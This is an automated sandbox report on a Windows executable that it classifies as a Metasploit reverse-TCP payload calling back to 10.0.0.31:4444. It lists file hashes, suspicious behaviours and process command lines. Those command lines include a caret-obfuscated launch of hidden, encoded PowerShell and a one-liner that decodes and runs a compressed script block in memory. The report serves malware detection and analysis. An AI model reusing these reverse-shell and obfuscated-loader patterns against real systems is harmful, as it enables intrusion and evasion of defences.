Analysis
max time kernel: 129s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/01/2024, 23:22
Static task: static1
Behavioral task: behavioral1
Sample: 6e1a88382a9a78105094ed412b1a9038.exe
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: 6e1a88382a9a78105094ed412b1a9038.exe
Resource: win10v2004-20231215-en
General
Target: 6e1a88382a9a78105094ed412b1a9038.exe
Size: 297KB
MD5: 6e1a88382a9a78105094ed412b1a9038
SHA1: 5ec88111ba9f5c96e5943a0f0d7ea169c3de97f3
SHA256: 64dac5ded715c47d9e36381bc87e6205ad02ffbab5b4f516a6bc91bb08fb4b68
SHA512: 72a01c0733a6b268953c538a23603c9a3710d72ba065c66d512738b73b688f61155ba78e2929e63aa82363c1d0b2bf6bcbf3d74ae78efe29cecab954dea395ea
SSDEEP: 6144:+9Ckr91bn+UdW5oPGNZuaReIn1mN/YaINny:+ZbnHx8uaR7nEKNy
Malware Config
Extracted
Family: metasploit
Payload: windows/reverse_tcp
LHOST:LPORT: 10.0.0.31:4444
Signatures
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid   Process
968   powershell.exe
968   powershell.exe
2780  powershell.exe
2780  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description              pid   Process
Token: SeDebugPrivilege  968   powershell.exe
Token: SeDebugPrivilege  2780  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
description                       pid   Process                               procid_target
PID 1996 wrote to memory of 4316  1996  6e1a88382a9a78105094ed412b1a9038.exe  89
PID 1996 wrote to memory of 4316  1996  6e1a88382a9a78105094ed412b1a9038.exe  89
PID 1996 wrote to memory of 4316  1996  6e1a88382a9a78105094ed412b1a9038.exe  89
PID 4316 wrote to memory of 968   4316  cmd.exe                               90
PID 4316 wrote to memory of 968   4316  cmd.exe                               90
PID 4316 wrote to memory of 968   4316  cmd.exe                               90
PID 968 wrote to memory of 2780   968   powershell.exe                        93
PID 968 wrote to memory of 2780   968   powershell.exe                        93
PID 968 wrote to memory of 2780   968   powershell.exe                        93
Processes
1. C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe"
   PID: 1996
   - Suspicious use of WriteProcessMemory
2. C:\Windows\SysWOW64\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c start /b /min p^o^wer^sh^ell.exe -nop -w hidden -e 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
   PID: 4316
   - Suspicious use of WriteProcessMemory
3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell.exe -nop -w hidden -e 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
   PID: 968
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
4. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
   Command line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
   PID: 2780
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
Filesize: 1KB
MD5: 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1: c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256: e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512: 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Filesize: 16KB
MD5: ac3c858880bd1eb4d29400b4cc79676b
SHA1: 89fb63de7701dd572f515c25d65e0a8ba5de1b71
SHA256: 6f4a267280d19a62720a0ab8ad7ceed6a9f68224ad5b5a37e1f21df20d3fff6c
SHA512: 2711485e3ec12bf6281b6333af50a9817c16471871c8099e7166ba521a0e2e61b997825da6899fc6bd711f26fcd9da11c978af343c1fb1ed039d24044de64ee9

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82